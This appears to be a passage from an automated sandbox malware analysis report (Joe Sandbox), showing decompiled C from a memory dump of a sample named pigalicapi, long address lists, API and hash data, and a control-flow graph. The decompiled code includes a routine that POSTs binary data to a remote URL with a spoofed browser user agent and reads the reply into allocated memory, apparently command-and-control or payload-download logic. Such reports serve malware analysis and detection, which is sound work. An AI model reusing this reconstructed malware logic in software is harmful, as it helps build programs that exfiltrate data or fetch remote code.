                                                                                                                                                                                                                                                                            										CloseHandle(_v328);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L39;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                            								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                            								E007B6C60();
                                                                                                                                                                                                                                                                            								_t421 = E007B1E60( &_v324);
                                                                                                                                                                                                                                                                            								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            								_v616 = _t421;
                                                                                                                                                                                                                                                                            								__eflags = _v616;
                                                                                                                                                                                                                                                                            								if(_v616 == 0) {
                                                                                                                                                                                                                                                                            									E007B6CF0();
                                                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								E007B74A0();
                                                                                                                                                                                                                                                                            								ExitProcess(0);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v60 =  *_v20;
                                                                                                                                                                                                                                                                            							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                            							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                            							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                            								goto L29;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                            						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                            							 *0x7c30e4 = 1;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *0x7c30e4 = 2;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L99;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
















































































                                                                                                                                                                                                                                                                            0x007b62b9
                                                                                                                                                                                                                                                                            0x007b62c4
                                                                                                                                                                                                                                                                            0x007b6c4e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b62d4
                                                                                                                                                                                                                                                                            0x007b62d9
                                                                                                                                                                                                                                                                            0x007b62e0
                                                                                                                                                                                                                                                                            0x007b62f9
                                                                                                                                                                                                                                                                            0x007b62fc
                                                                                                                                                                                                                                                                            0x007b630e
                                                                                                                                                                                                                                                                            0x007b631e
                                                                                                                                                                                                                                                                            0x007b6343
                                                                                                                                                                                                                                                                            0x007b6349
                                                                                                                                                                                                                                                                            0x007b6354
                                                                                                                                                                                                                                                                            0x007b635d
                                                                                                                                                                                                                                                                            0x007b6363
                                                                                                                                                                                                                                                                            0x007b6429
                                                                                                                                                                                                                                                                            0x007b6308
                                                                                                                                                                                                                                                                            0x007b6308
                                                                                                                                                                                                                                                                            0x007b630b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b630b
                                                                                                                                                                                                                                                                            0x007b636f
                                                                                                                                                                                                                                                                            0x007b6375
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b637b
                                                                                                                                                                                                                                                                            0x007b6381
                                                                                                                                                                                                                                                                            0x007b6384
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6391
                                                                                                                                                                                                                                                                            0x007b6393
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6399
                                                                                                                                                                                                                                                                            0x007b639f
                                                                                                                                                                                                                                                                            0x007b63a2
                                                                                                                                                                                                                                                                            0x007b6419
                                                                                                                                                                                                                                                                            0x007b641e
                                                                                                                                                                                                                                                                            0x007b6424
                                                                                                                                                                                                                                                                            0x007b6427
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6427
                                                                                                                                                                                                                                                                            0x007b63ad
                                                                                                                                                                                                                                                                            0x007b63c3
                                                                                                                                                                                                                                                                            0x007b63c6
                                                                                                                                                                                                                                                                            0x007b63ca
                                                                                                                                                                                                                                                                            0x007b640e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b640e
                                                                                                                                                                                                                                                                            0x007b63dc
                                                                                                                                                                                                                                                                            0x007b63e1
                                                                                                                                                                                                                                                                            0x007b63e4
                                                                                                                                                                                                                                                                            0x007b63ef
                                                                                                                                                                                                                                                                            0x007b63f4
                                                                                                                                                                                                                                                                            0x007b63fa
                                                                                                                                                                                                                                                                            0x007b63fa
                                                                                                                                                                                                                                                                            0x007b6408
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6320
                                                                                                                                                                                                                                                                            0x007b6325
                                                                                                                                                                                                                                                                            0x007b632e
                                                                                                                                                                                                                                                                            0x007b633a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b633c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b633c
                                                                                                                                                                                                                                                                            0x007b633a
                                                                                                                                                                                                                                                                            0x007b631e
                                                                                                                                                                                                                                                                            0x007b642e
                                                                                                                                                                                                                                                                            0x007b6438
                                                                                                                                                                                                                                                                            0x007b643b
                                                                                                                                                                                                                                                                            0x007b644d
                                                                                                                                                                                                                                                                            0x007b6450
                                                                                                                                                                                                                                                                            0x007b6453
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6459
                                                                                                                                                                                                                                                                            0x007b645d
                                                                                                                                                                                                                                                                            0x007b6482
                                                                                                                                                                                                                                                                            0x007b6488
                                                                                                                                                                                                                                                                            0x007b6493
                                                                                                                                                                                                                                                                            0x007b649c
                                                                                                                                                                                                                                                                            0x007b64a2
                                                                                                                                                                                                                                                                            0x007b65f3
                                                                                                                                                                                                                                                                            0x007b65f3
                                                                                                                                                                                                                                                                            0x007b65f9
                                                                                                                                                                                                                                                                            0x007b65fc
                                                                                                                                                                                                                                                                            0x007b6609
                                                                                                                                                                                                                                                                            0x007b660f
                                                                                                                                                                                                                                                                            0x007b6bdd
                                                                                                                                                                                                                                                                            0x007b6be3
                                                                                                                                                                                                                                                                            0x007b6be9
                                                                                                                                                                                                                                                                            0x007b6c18
                                                                                                                                                                                                                                                                            0x007b6c1e
                                                                                                                                                                                                                                                                            0x007b6c24
                                                                                                                                                                                                                                                                            0x007b6c26
                                                                                                                                                                                                                                                                            0x007b6c26
                                                                                                                                                                                                                                                                            0x007b6c2a
                                                                                                                                                                                                                                                                            0x007b6444
                                                                                                                                                                                                                                                                            0x007b6447
                                                                                                                                                                                                                                                                            0x007b6447
                                                                                                                                                                                                                                                                            0x007b644a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b644a
                                                                                                                                                                                                                                                                            0x007b6bf1
                                                                                                                                                                                                                                                                            0x007b6bf7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6c01
                                                                                                                                                                                                                                                                            0x007b6c07
                                                                                                                                                                                                                                                                            0x007b6c0e
                                                                                                                                                                                                                                                                            0x007b6c13
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6c13
                                                                                                                                                                                                                                                                            0x007b661b
                                                                                                                                                                                                                                                                            0x007b6621
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6633
                                                                                                                                                                                                                                                                            0x007b6638
                                                                                                                                                                                                                                                                            0x007b663e
                                                                                                                                                                                                                                                                            0x007b6640
                                                                                                                                                                                                                                                                            0x007b6647
                                                                                                                                                                                                                                                                            0x007b664a
                                                                                                                                                                                                                                                                            0x007b664e
                                                                                                                                                                                                                                                                            0x007b6752
                                                                                                                                                                                                                                                                            0x007b6752
                                                                                                                                                                                                                                                                            0x007b6758
                                                                                                                                                                                                                                                                            0x007b675b
                                                                                                                                                                                                                                                                            0x007b69cb
                                                                                                                                                                                                                                                                            0x007b69dc
                                                                                                                                                                                                                                                                            0x007b69ed
                                                                                                                                                                                                                                                                            0x007b69f2
                                                                                                                                                                                                                                                                            0x007b6a1a
                                                                                                                                                                                                                                                                            0x007b6a3c
                                                                                                                                                                                                                                                                            0x007b6a42
                                                                                                                                                                                                                                                                            0x007b6a49
                                                                                                                                                                                                                                                                            0x007b6bd6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6bd6
                                                                                                                                                                                                                                                                            0x007b6a4f
                                                                                                                                                                                                                                                                            0x007b6a59
                                                                                                                                                                                                                                                                            0x007b6a66
                                                                                                                                                                                                                                                                            0x007b6a6c
                                                                                                                                                                                                                                                                            0x007b6a72
                                                                                                                                                                                                                                                                            0x007b6a75
                                                                                                                                                                                                                                                                            0x007b6b3c
                                                                                                                                                                                                                                                                            0x007b6a7b
                                                                                                                                                                                                                                                                            0x007b6a84
                                                                                                                                                                                                                                                                            0x007b6aa0
                                                                                                                                                                                                                                                                            0x007b6aa6
                                                                                                                                                                                                                                                                            0x007b6aad
                                                                                                                                                                                                                                                                            0x007b6ac5
                                                                                                                                                                                                                                                                            0x007b6aca
                                                                                                                                                                                                                                                                            0x007b6ad0
                                                                                                                                                                                                                                                                            0x007b6af6
                                                                                                                                                                                                                                                                            0x007b6b02
                                                                                                                                                                                                                                                                            0x007b6b02
                                                                                                                                                                                                                                                                            0x007b6b16
                                                                                                                                                                                                                                                                            0x007b6b16
                                                                                                                                                                                                                                                                            0x007b6b1c
                                                                                                                                                                                                                                                                            0x007b6b42
                                                                                                                                                                                                                                                                            0x007b6b49
                                                                                                                                                                                                                                                                            0x007b6bc9
                                                                                                                                                                                                                                                                            0x007b6bd0
                                                                                                                                                                                                                                                                            0x007b6b4b
                                                                                                                                                                                                                                                                            0x007b6b51
                                                                                                                                                                                                                                                                            0x007b6b57
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6b60
                                                                                                                                                                                                                                                                            0x007b6b6d
                                                                                                                                                                                                                                                                            0x007b6b72
                                                                                                                                                                                                                                                                            0x007b6b75
                                                                                                                                                                                                                                                                            0x007b6b7b
                                                                                                                                                                                                                                                                            0x007b6b82
                                                                                                                                                                                                                                                                            0x007b6b84
                                                                                                                                                                                                                                                                            0x007b6b87
                                                                                                                                                                                                                                                                            0x007b6b8b
                                                                                                                                                                                                                                                                            0x007b6b99
                                                                                                                                                                                                                                                                            0x007b6b9e
                                                                                                                                                                                                                                                                            0x007b6b9e
                                                                                                                                                                                                                                                                            0x007b6ba1
                                                                                                                                                                                                                                                                            0x007b6ba7
                                                                                                                                                                                                                                                                            0x007b6baa
                                                                                                                                                                                                                                                                            0x007b6bb8
                                                                                                                                                                                                                                                                            0x007b6bbd
                                                                                                                                                                                                                                                                            0x007b6bbd
                                                                                                                                                                                                                                                                            0x007b6bc0
                                                                                                                                                                                                                                                                            0x007b6bc0
                                                                                                                                                                                                                                                                            0x007b6bc7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6b49
                                                                                                                                                                                                                                                                            0x007b6761
                                                                                                                                                                                                                                                                            0x007b676b
                                                                                                                                                                                                                                                                            0x007b6775
                                                                                                                                                                                                                                                                            0x007b677f
                                                                                                                                                                                                                                                                            0x007b6785
                                                                                                                                                                                                                                                                            0x007b6788
                                                                                                                                                                                                                                                                            0x007b685c
                                                                                                                                                                                                                                                                            0x007b6861
                                                                                                                                                                                                                                                                            0x007b6864
                                                                                                                                                                                                                                                                            0x007b678e
                                                                                                                                                                                                                                                                            0x007b6797
                                                                                                                                                                                                                                                                            0x007b67ad
                                                                                                                                                                                                                                                                            0x007b67b3
                                                                                                                                                                                                                                                                            0x007b67b9
                                                                                                                                                                                                                                                                            0x007b67c0
                                                                                                                                                                                                                                                                            0x007b67dc
                                                                                                                                                                                                                                                                            0x007b67e1
                                                                                                                                                                                                                                                                            0x007b67e7
                                                                                                                                                                                                                                                                            0x007b67f0
                                                                                                                                                                                                                                                                            0x007b67f5
                                                                                                                                                                                                                                                                            0x007b67f8
                                                                                                                                                                                                                                                                            0x007b67fe
                                                                                                                                                                                                                                                                            0x007b6804
                                                                                                                                                                                                                                                                            0x007b6807
                                                                                                                                                                                                                                                                            0x007b6819
                                                                                                                                                                                                                                                                            0x007b681f
                                                                                                                                                                                                                                                                            0x007b683a
                                                                                                                                                                                                                                                                            0x007b683f
                                                                                                                                                                                                                                                                            0x007b683f
                                                                                                                                                                                                                                                                            0x007b6807
                                                                                                                                                                                                                                                                            0x007b6850
                                                                                                                                                                                                                                                                            0x007b6850
                                                                                                                                                                                                                                                                            0x007b6856
                                                                                                                                                                                                                                                                            0x007b686a
                                                                                                                                                                                                                                                                            0x007b6871
                                                                                                                                                                                                                                                                            0x007b6877
                                                                                                                                                                                                                                                                            0x007b687a
                                                                                                                                                                                                                                                                            0x007b687e
                                                                                                                                                                                                                                                                            0x007b688c
                                                                                                                                                                                                                                                                            0x007b6891
                                                                                                                                                                                                                                                                            0x007b6891
                                                                                                                                                                                                                                                                            0x007b6894
                                                                                                                                                                                                                                                                            0x007b689a
                                                                                                                                                                                                                                                                            0x007b689d
                                                                                                                                                                                                                                                                            0x007b68a5
                                                                                                                                                                                                                                                                            0x007b68aa
                                                                                                                                                                                                                                                                            0x007b68ad
                                                                                                                                                                                                                                                                            0x007b68b9
                                                                                                                                                                                                                                                                            0x007b68bf
                                                                                                                                                                                                                                                                            0x007b68c5
                                                                                                                                                                                                                                                                            0x007b68c8
                                                                                                                                                                                                                                                                            0x007b6902
                                                                                                                                                                                                                                                                            0x007b690a
                                                                                                                                                                                                                                                                            0x007b690d
                                                                                                                                                                                                                                                                            0x007b6920
                                                                                                                                                                                                                                                                            0x007b6925
                                                                                                                                                                                                                                                                            0x007b6931
                                                                                                                                                                                                                                                                            0x007b6931
                                                                                                                                                                                                                                                                            0x007b68ca
                                                                                                                                                                                                                                                                            0x007b68d6
                                                                                                                                                                                                                                                                            0x007b68e4
                                                                                                                                                                                                                                                                            0x007b68e4
                                                                                                                                                                                                                                                                            0x007b693a
                                                                                                                                                                                                                                                                            0x007b693d
                                                                                                                                                                                                                                                                            0x007b694b
                                                                                                                                                                                                                                                                            0x007b695a
                                                                                                                                                                                                                                                                            0x007b6971
                                                                                                                                                                                                                                                                            0x007b6977
                                                                                                                                                                                                                                                                            0x007b6984
                                                                                                                                                                                                                                                                            0x007b6984
                                                                                                                                                                                                                                                                            0x007b693d
                                                                                                                                                                                                                                                                            0x007b698a
                                                                                                                                                                                                                                                                            0x007b6990
                                                                                                                                                                                                                                                                            0x007b6993
                                                                                                                                                                                                                                                                            0x007b69a1
                                                                                                                                                                                                                                                                            0x007b69a6
                                                                                                                                                                                                                                                                            0x007b69a6
                                                                                                                                                                                                                                                                            0x007b69a9
                                                                                                                                                                                                                                                                            0x007b69a9
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b69b0
                                                                                                                                                                                                                                                                            0x007b6667
                                                                                                                                                                                                                                                                            0x007b666d
                                                                                                                                                                                                                                                                            0x007b6674
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6689
                                                                                                                                                                                                                                                                            0x007b6693
                                                                                                                                                                                                                                                                            0x007b6698
                                                                                                                                                                                                                                                                            0x007b669b
                                                                                                                                                                                                                                                                            0x007b66a7
                                                                                                                                                                                                                                                                            0x007b66b8
                                                                                                                                                                                                                                                                            0x007b66c6
                                                                                                                                                                                                                                                                            0x007b66d5
                                                                                                                                                                                                                                                                            0x007b66e4
                                                                                                                                                                                                                                                                            0x007b66f0
                                                                                                                                                                                                                                                                            0x007b66ff
                                                                                                                                                                                                                                                                            0x007b670e
                                                                                                                                                                                                                                                                            0x007b671d
                                                                                                                                                                                                                                                                            0x007b673a
                                                                                                                                                                                                                                                                            0x007b6747
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6747
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6642
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b65fe
                                                                                                                                                                                                                                                                            0x007b64ae
                                                                                                                                                                                                                                                                            0x007b64b4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b64cb
                                                                                                                                                                                                                                                                            0x007b64dc
                                                                                                                                                                                                                                                                            0x007b64ed
                                                                                                                                                                                                                                                                            0x007b64f2
                                                                                                                                                                                                                                                                            0x007b651a
                                                                                                                                                                                                                                                                            0x007b653f
                                                                                                                                                                                                                                                                            0x007b6545
                                                                                                                                                                                                                                                                            0x007b654c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b6552
                                                                                                                                                                                                                                                                            0x007b655c
                                                                                                                                                                                                                                                                            0x007b657e
                                                                                                                                                                                                                                                                            0x007b6584
                                                                                                                                                                                                                                                                            0x007b6586
                                                                                                                                                                                                                                                                            0x007b65dd
                                                                                                                                                                                                                                                                            0x007b65dd
                                                                                                                                                                                                                                                                            0x007b65e4
                                                                                                                                                                                                                                                                            0x007b65ed
                                                                                                                                                                                                                                                                            0x007b65ed
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b65e4
                                                                                                                                                                                                                                                                            0x007b658e
                                                                                                                                                                                                                                                                            0x007b6591
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b65a0
                                                                                                                                                                                                                                                                            0x007b65a6
                                                                                                                                                                                                                                                                            0x007b65b2
                                                                                                                                                                                                                                                                            0x007b65b7
                                                                                                                                                                                                                                                                            0x007b65ba
                                                                                                                                                                                                                                                                            0x007b65c0
                                                                                                                                                                                                                                                                            0x007b65c7
                                                                                                                                                                                                                                                                            0x007b65d8
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b65d8
                                                                                                                                                                                                                                                                            0x007b65c9
                                                                                                                                                                                                                                                                            0x007b65d0
                                                                                                                                                                                                                                                                            0x007b65d0
                                                                                                                                                                                                                                                                            0x007b6464
                                                                                                                                                                                                                                                                            0x007b646d
                                                                                                                                                                                                                                                                            0x007b6476
                                                                                                                                                                                                                                                                            0x007b6479
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b647b
                                                                                                                                                                                                                                                                            0x007b6c33
                                                                                                                                                                                                                                                                            0x007b6c36
                                                                                                                                                                                                                                                                            0x007b6c44
                                                                                                                                                                                                                                                                            0x007b6c38
                                                                                                                                                                                                                                                                            0x007b6c38
                                                                                                                                                                                                                                                                            0x007b6c38
                                                                                                                                                                                                                                                                            0x007b6c36
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b62e0

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 007B63BD
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 007B6408
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                            • String ID: Lyoxokxeruqp$TEMP$TEMP
                                                                                                                                                                                                                                                                            • API String ID: 2087232378-3648022833
                                                                                                                                                                                                                                                                            • Opcode ID: f424a5601abb0386ce629bf578f98c5e123e4cdf5a05b8dab508e2c4391b2c9d
                                                                                                                                                                                                                                                                            • Instruction ID: 49fe4dc588ec7962e170a0e6fba0fe212bb24f078a0a880f27af9d9485ee364f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f424a5601abb0386ce629bf578f98c5e123e4cdf5a05b8dab508e2c4391b2c9d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83522AB5A00218DFDB14DF94DC89FEEB7B5BB48304F148598E609AB291D778AE80CF54
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 450 7b1840-7b1854 451 7b185a-7b185e 450->451 452 7b1c95-7b1c9b 450->452 451->452 453 7b1864-7b1868 451->453 453->452 454 7b186e-7b1872 453->454 454->452 455 7b1878-7b190a call 7b7d20 InternetCrackUrlA 454->455 455->452 458 7b1910-7b1930 InternetOpenA 455->458 458->452 459 7b1936-7b1969 InternetConnectA 458->459 460 7b1c88-7b1c8f InternetCloseHandle 459->460 461 7b196f-7b19a7 HttpOpenRequestA 459->461 460->452 462 7b1c7b-7b1c82 InternetCloseHandle 461->462 463 7b19ad-7b19e5 wnsprintfA HttpAddRequestHeadersA 461->463 462->460 464 7b19eb-7b19f9 463->464 465 7b1c6e-7b1c75 InternetCloseHandle 463->465 466 7b19fb-7b19fe 464->466 467 7b1a04-7b1a26 InternetSetOptionA 464->467 465->462 466->467 468 7b1a30-7b1a75 call 7b7d20 HttpSendRequestA 467->468 471 7b1a7b-7b1aa1 HttpQueryInfoA 468->471 472 7b1c4c-7b1c5f 468->472 473 7b1ac9-7b1b0f call 7b7d20 HttpQueryInfoA 471->473 474 7b1aa3-7b1abc call 7b7dd0 471->474 472->465 475 7b1c61-7b1c68 472->475 481 7b1b11-7b1b2d call 7b7dd0 473->481 482 7b1b47-7b1b6a VirtualAlloc 473->482 474->473 480 7b1abe-7b1ac7 474->480 475->465 475->468 480->473 481->482 491 7b1b2f-7b1b39 481->491 484 7b1c19 482->484 485 7b1b70-7b1b93 482->485 487 7b1c23-7b1c4a InternetReadFile 484->487 486 7b1b99-7b1bc9 InternetReadFile 485->486 489 7b1bdb-7b1be2 486->489 490 7b1bcb-7b1bd9 486->490 487->472 487->487 492 7b1be6-7b1c11 489->492 493 7b1be4 489->493 490->489 491->482 494 7b1b3b-7b1b41 491->494 496 7b1c13 492->496 497 7b1c15 492->497 495 7b1c17 493->495 494->482 495->472 496->495 497->486
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B1840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                                                            				char _v1300;
                                                                                                                                                                                                                                                                            				char _v1564;
                                                                                                                                                                                                                                                                            				void* _v1568;
                                                                                                                                                                                                                                                                            				void* _v1572;
                                                                                                                                                                                                                                                                            				char* _v1576;
                                                                                                                                                                                                                                                                            				intOrPtr _v1588;
                                                                                                                                                                                                                                                                            				char* _v1592;
                                                                                                                                                                                                                                                                            				signed short _v1612;
                                                                                                                                                                                                                                                                            				intOrPtr _v1616;
                                                                                                                                                                                                                                                                            				char* _v1620;
                                                                                                                                                                                                                                                                            				void* _v1636;
                                                                                                                                                                                                                                                                            				void* _v1640;
                                                                                                                                                                                                                                                                            				void* _v1644;
                                                                                                                                                                                                                                                                            				void* _v1648;
                                                                                                                                                                                                                                                                            				long _v1652;
                                                                                                                                                                                                                                                                            				void _v1656;
                                                                                                                                                                                                                                                                            				void _v1916;
                                                                                                                                                                                                                                                                            				long _v1920;
                                                                                                                                                                                                                                                                            				long _v1924;
                                                                                                                                                                                                                                                                            				long _v1928;
                                                                                                                                                                                                                                                                            				void* _v1932;
                                                                                                                                                                                                                                                                            				intOrPtr _v1936;
                                                                                                                                                                                                                                                                            				long _v1940;
                                                                                                                                                                                                                                                                            				long _v1944;
                                                                                                                                                                                                                                                                            				long _v1948;
                                                                                                                                                                                                                                                                            				void _v2972;
                                                                                                                                                                                                                                                                            				long _v2976;
                                                                                                                                                                                                                                                                            				int _t116;
                                                                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                                                            				void* _t123;
                                                                                                                                                                                                                                                                            				int _t133;
                                                                                                                                                                                                                                                                            				void* _t143;
                                                                                                                                                                                                                                                                            				long _t151;
                                                                                                                                                                                                                                                                            				void* _t194;
                                                                                                                                                                                                                                                                            				void* _t195;
                                                                                                                                                                                                                                                                            				void* _t196;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L37:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v1644 = 0;
                                                                                                                                                                                                                                                                            					_v1640 = 0;
                                                                                                                                                                                                                                                                            					_v1568 = 0;
                                                                                                                                                                                                                                                                            					_v1576 = "*/*";
                                                                                                                                                                                                                                                                            					_v1572 = 0;
                                                                                                                                                                                                                                                                            					E007B7D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                                            					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                            					_v1636 = 0x3c;
                                                                                                                                                                                                                                                                            					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                                            					_v1616 = 0x104;
                                                                                                                                                                                                                                                                            					_v1592 =  &_v276;
                                                                                                                                                                                                                                                                            					_v1588 = 0x104;
                                                                                                                                                                                                                                                                            					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                                            					if(_t116 == 0) {
                                                                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                            					_v1644 = _t117;
                                                                                                                                                                                                                                                                            					if(_v1644 == 0) {
                                                                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                            					_v1640 = _t119;
                                                                                                                                                                                                                                                                            					if(_v1640 == 0) {
                                                                                                                                                                                                                                                                            						L36:
                                                                                                                                                                                                                                                                            						InternetCloseHandle(_v1644);
                                                                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                                            					_v1568 = _t123;
                                                                                                                                                                                                                                                                            					if(_v1568 == 0) {
                                                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                                                            						InternetCloseHandle(_v1640);
                                                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                                            					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                                            					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                                            						L34:
                                                                                                                                                                                                                                                                            						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v1656 = 0x7530;
                                                                                                                                                                                                                                                                            					if(_a28 > 0) {
                                                                                                                                                                                                                                                                            						_v1656 = _a28;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                                            					_v1652 = 1;
                                                                                                                                                                                                                                                                            					_v1648 = 0;
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						_v1920 = 0x100;
                                                                                                                                                                                                                                                                            						E007B7D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                            						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                            						_v1924 = 0;
                                                                                                                                                                                                                                                                            						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
